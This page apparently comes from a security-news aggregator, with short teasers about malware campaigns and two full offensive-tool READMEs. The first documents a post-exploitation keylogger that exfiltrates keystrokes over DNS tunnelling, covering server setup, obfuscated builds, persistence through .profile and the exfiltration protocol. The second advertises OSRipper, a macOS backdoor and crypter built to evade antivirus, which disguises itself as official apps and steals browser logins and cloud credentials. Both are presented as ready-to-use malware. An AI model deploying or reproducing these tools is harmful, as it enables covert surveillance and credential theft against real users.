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MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks

An unknown threat actor is exploiting known security flaws in Microsoft Exchange Server to deploy a keylogger malware in attacks targeting entities in Africa and the Middle East. Russian cybersecurity firm Positive Technologies said it identified over 30 victims spanning government agencies, banks, IT companies, and educational institutions. The first-ever compromise dates back to 2021. "This

DNS-Tunnel-Keylogger - Keylogging Server And Client That Uses DNS Tunneling/Exfiltration To Transmit Keystrokes

By: Zion3R

This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

These tools excel at lightweight exfiltration and persistence, properties which will prevent detection. It uses DNS tunelling/exfiltration to bypass firewalls and avoid detection.



The server uses python3.

To install dependencies, run python3 -m pip install -r requirements.txt

Starting the Server

To start the server, run python3

usage: dns exfiltration server [-h] [-p PORT] ip domain

positional arguments:

-h, --help show this help message and exit
-p PORT, --port PORT port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.


On the registrar, you want to change your domain's namespace to custom DNS.

Point them to two domains, and

Add records that make point the namespace domains to your exfiltration server's IP address.

This is the same as setting glue records.



The Linux keylogger is two bash scripts. is used by the script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the script. It will automatically establish a connection and send the data.

# Usage: [-options] domain
# Positional Arguments:
# domain: the domain to send data to
# Options:
# -p path: give path to log file to listen to
# -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./ [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging. and must be in the same directory for the keylogger to work. If you want persistance, you can add the command to .profile to start on every new interactive shell.

Usage: command [-options] domain
Positional Arguments:
domain: the domain to send data to
-n: number of characters to store before sending a packet



To build keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production

You can also choose to build the program with debugging by making the debug target.

make debug

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @ A +short send a connection request to a server on localhost.

dig @ A +short send a test message to localhost.

Replace with the domain the server is listening for.


Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.

Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends an malformed record request, the server will respond with code 201.

202: Non-Existant Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204 Reached Max Connection

If the client attempts to create a connection when the max has reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes


Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.


Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.

AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks

Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT. The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin America-based financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social

SystemBC Malware's C2 Server Analysis Exposes Payload Delivery Tricks

Cybersecurity researchers have shed light on the command-and-control (C2) server workings of a known malware family called SystemBC. "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk

Remcos RAT Spreading Through Adult Games in New Attack Wave

The remote access trojan (RAT) known as Remcos RAT has been found being propagated via webhards by disguising it as adult-themed games in South Korea. WebHard, short for web hard drive, is a popular online file storage system used to upload, download, and share files in the country. While webhards have been used in the past to deliver njRAT, UDP RAT, and DDoS botnet malware, the

UAC-0099 Using WinRAR Exploit to Target Ukrainian Firms with LONEPAGE Malware

The threat actor known as UAC-0099 has been linked to continued attacks aimed at Ukraine, some of which leverage a high-severity flaw in the WinRAR software to deliver a malware strain called LONEPAGE. "The threat actor targets Ukrainian employees working for companies outside of Ukraine," cybersecurity firm Deep Instinct said in a Thursday analysis. UAC-0099 was first

Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges

The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable. This approach not only transforms it into a threat capable of delivering "specific distributor needs," but also makes it more potent, Check Point said&

New Agent Tesla Malware Variant Using ZPAQ Compression in Email Attacks

A new variant of theΒ Agent TeslaΒ malware has been observed delivered via a lure file with theΒ ZPAQ compression formatΒ to harvest data from several email clients and nearly 40 web browsers. "ZPAQ is a file compression format that offers a better compression ratio and journaling function compared to widely used formats like ZIP and RAR," G Data malware analyst Anna LvovaΒ saidΒ in a Monday analysis.

Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies

The Pakistan-based advanced persistent threat (APT) actor known asΒ Transparent TribeΒ used a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon. "Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.

International Law Enforcement Takes Down Infamous NetWire Cross-Platform RAT

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LastPass: Keylogger on home PC led to cracked corporate password vault

Seems the crooks implanted a keylogger via a vulnerable media app (LastPass politely didn't say which one!) on a developer's home computer.

OSRipper - AV Evading OSX Backdoor And Crypter Framework

OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


  • FUD (for macOS)
  • Cloacks as an official app (Microsoft, ExpressVPN etc)
  • Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique


Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

Here are example backdoors which were generated with OSRipper

Β macOS .apps will look like this on vt

Getting Started


You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.



apt install git python -y
git clone
cd OSRipper
pip3 install -r requirements.txt


git clone
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from

Executing program

Only this

sudo python3


Please feel free to fork and open pull repuests. Suggestions/critisizm are appreciated as well



  • βœ…Get down detection to 0/26 on
  • βœ…Add Changelog
  • βœ…Daemonise Backdoor
  • βœ…Add Crypter
  • βœ…Add More Backdoor templates
  • βœ…Get down detection to at least 0/68 on VT (for mac malware)


  • βœ…Add AntiVM
  • [] Implement tor hidden services
  • βœ…Add Logger
  • βœ…Add Password stealer
  • [] Add KeyLogger
  • βœ…Add some new evasion options
  • βœ…Add SilentMiner
  • [] Make proper C2 server


Coming soon


Just open a issue and ill make sure to get back to you


  • 0.2.1

    • OSRipper will now pull all information from the Target and send them to the c2 server over sockets. This includes information like browser history, passwords, system information, keys and etc.
  • 0.1.6

    • Proccess will now trojanise itself as and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the Proccess invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release




Inspiration, code snippets, etc.


I am very sorry to even write this here but my finances are not looking good right now. If you appreciate my work i would really be happy about any donation. You do NOT have to this is solely optional

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T


I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.
